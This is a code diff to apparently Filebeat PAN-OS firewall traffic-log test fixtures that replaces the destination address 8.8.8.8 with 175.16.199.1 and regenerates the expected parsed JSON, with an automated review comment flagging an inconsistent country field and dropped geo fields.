-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
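Review bot: The replacement records keep `United States` in the PAN-OS destination-location column (the field right after `192.168.0.0-192.168.255.255`) while the new destination 175.16.199.1 is enriched as China in the regenerated expected file, so the fixture now carries two contradictory country values for the same flow. If the column is meant to stay vendor-reported rather than derived, a one-line comment in the commit description saying so would stop a later reader from treating the mismatch as a parser bug; otherwise changing that column to `China` on the added lines keeps the sample self-consistent. The same pattern appears in the earlier hunk of this file, whose start is outside this view. The expected file also drops `destination.as.*` and most `destination.geo.*` fields for destinations this commit does not touch (184.51.253.152, 17.253.3.202, 216.58.194.99, 209.234.224.22, 172.217.2.238), which presumably reflects a change in the test GeoIP database rather than the address swap; noting that in the description would keep a future regeneration from being mistaken for an enrichment regression.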
diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json
index 7e2a55dd0f08..fa7fb92877c2 100644
--- a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json
@@ -8,14 +8,7 @@
 "client.packets": 16,
 "client.port": 55113,
 "destination.address": "184.51.253.152",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
 "destination.bytes": 5976,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "184.51.253.152",
 "destination.nat.ip": "184.51.253.152",
 "destination.nat.port": 443,
@@ -117,17 +110,18 @@
 "client.nat.port": 0,
 "client.packets": 6,
 "client.port": 0,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 588,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 0,
 "destination.packets": 6,
 "destination.port": 0,
@@ -141,7 +135,7 @@
 "event.end": "2018-11-30T16:08:55.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:08:55.000-02:00",
 "event.timezone": "-02:00",
@@ -157,8 +151,8 @@
 "network.application": "ping",
 "network.bytes": 1176,
 "network.community_id": [
- "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
- "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+ "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+ "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
 ],
 "network.direction": "outbound",
 "network.packets": 12,
@@ -175,12 +169,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 0,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24223",
- "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+ "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091113,
 "panw.panos.source.interface": "ethernet1/2",
@@ -195,14 +189,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 588,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 0,
 "server.packets": 6,
 "server.port": 0,
@@ -228,17 +222,7 @@
 "client.packets": 6,
 "client.port": 55114,
 "destination.address": "17.253.3.202",
- "destination.as.number": 6185,
- "destination.as.organization.name": "Apple Inc.",
 "destination.bytes": 1035,
- "destination.geo.city_name": "Dallas",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 32.7787,
- "destination.geo.location.lon": -96.8217,
- "destination.geo.region_iso_code": "US-TX",
- "destination.geo.region_name": "Texas",
 "destination.ip": "17.253.3.202",
 "destination.nat.ip": "17.253.3.202",
 "destination.nat.port": 80,
@@ -266,7 +250,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 947,
+ "log.offset": 957,
 "network.application": "web-browsing",
 "network.bytes": 1574,
 "network.community_id": [
@@ -340,17 +324,18 @@
 "client.nat.port": 0,
 "client.packets": 6,
 "client.port": 0,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 588,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 0,
 "destination.packets": 6,
 "destination.port": 0,
@@ -364,7 +349,7 @@
 "event.end": "2018-11-30T16:09:01.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:01.000-02:00",
 "event.timezone": "-02:00",
@@ -376,12 +361,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 1441,
+ "log.offset": 1451,
 "network.application": "ping",
 "network.bytes": 1176,
 "network.community_id": [
- "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
- "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+ "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+ "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
 ],
 "network.direction": "outbound",
 "network.packets": 12,
@@ -398,12 +383,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 0,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24043",
- "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+ "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091115,
 "panw.panos.source.interface": "ethernet1/2",
@@ -418,14 +403,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 588,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 0,
 "server.packets": 6,
 "server.port": 0,
@@ -451,17 +436,7 @@
 "client.packets": 5,
 "client.port": 46774,
 "destination.address": "216.58.194.99",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
 "destination.bytes": 1613,
- "destination.geo.city_name": "Mountain View",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.3861,
- "destination.geo.location.lon": -122.0839,
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "216.58.194.99",
 "destination.nat.ip": "216.58.194.99",
 "destination.nat.port": 443,
@@ -489,7 +464,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 1885,
+ "log.offset": 1905,
 "network.application": "quic",
 "network.bytes": 3627,
 "network.community_id": [
@@ -564,14 +539,7 @@
 "client.packets": 62,
 "client.port": 52408,
 "destination.address": "209.234.224.22",
- "destination.as.number": 395162,
- "destination.as.organization.name": "Markit On Demand, Inc.",
 "destination.bytes": 21111,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "209.234.224.22",
 "destination.nat.ip": "209.234.224.22",
 "destination.nat.port": 443,
@@ -599,7 +567,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 2353,
+ "log.offset": 2373,
 "network.application": "ssl",
 "network.bytes": 41753,
 "network.community_id": [
@@ -673,17 +641,18 @@
 "client.nat.port": 0,
 "client.packets": 6,
 "client.port": 0,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 588,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 0,
 "destination.packets": 6,
 "destination.port": 0,
@@ -697,7 +666,7 @@
 "event.end": "2018-11-30T16:09:07.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:07.000-02:00",
 "event.timezone": "-02:00",
@@ -709,12 +678,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 2844,
+ "log.offset": 2864,
 "network.application": "ping",
 "network.bytes": 1176,
 "network.community_id": [
- "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
- "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+ "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+ "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
 ],
 "network.direction": "outbound",
 "network.packets": 12,
@@ -731,12 +700,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 0,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "21394",
- "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+ "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091118,
 "panw.panos.source.interface": "ethernet1/2",
@@ -751,14 +720,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 588,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 0,
 "server.packets": 6,
 "server.port": 0,
@@ -784,14 +753,7 @@
 "client.packets": 7,
 "client.port": 59190,
 "destination.address": "172.217.2.238",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
 "destination.bytes": 3732,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "172.217.2.238",
 "destination.nat.ip": "172.217.2.238",
 "destination.nat.port": 443,
@@ -819,7 +781,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 3288,
+ "log.offset": 3318,
 "network.application": "quic",
 "network.bytes": 7097,
 "network.community_id": [
@@ -893,17 +855,18 @@
 "client.nat.port": 26654,
 "client.packets": 1,
 "client.port": 49728,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 221,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -917,7 +880,7 @@
 "event.end": "2018-11-30T16:08:50.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:08:50.000-02:00",
 "event.timezone": "-02:00",
@@ -929,12 +892,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 3758,
+ "log.offset": 3788,
 "network.application": "dns",
 "network.bytes": 301,
 "network.community_id": [
- "1:l1lEn2QIKjwJgww02PEndRveudE=",
- "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs="
+ "1:2J7SUgG1vsxw4i37iwcSTv8Oehg=",
+ "1:T5lRauQXneZw22xJbGrCiKA4dOY="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -951,12 +914,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24179", - "panw.panos.network.nat.community_id": "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs=", + "panw.panos.network.nat.community_id": "1:T5lRauQXneZw22xJbGrCiKA4dOY=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091120, "panw.panos.source.interface": "ethernet1/2", @@ -971,14 +934,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 221, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -1003,17 +966,18 @@ "client.nat.port": 2486, "client.packets": 1, "client.port": 50500, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 221, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1027,7 +991,7 @@ "event.end": "2018-11-30T16:08:51.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:51.000-02:00", "event.timezone": "-02:00", @@ -1039,12 +1003,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 4207, + "log.offset": 4247, "network.application": "dns", "network.bytes": 298, "network.community_id": [ - "1:RK6Ut4Rb0DTrl9IRf27cop79UwI=", - "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=" + "1:SU+OmGVh/EDib8CmztQBWimJutE=", + "1:hL1V047KcxzlTjRlyOw0JDOTtoc=" ], "network.direction": "outbound", "network.packets": 2, 
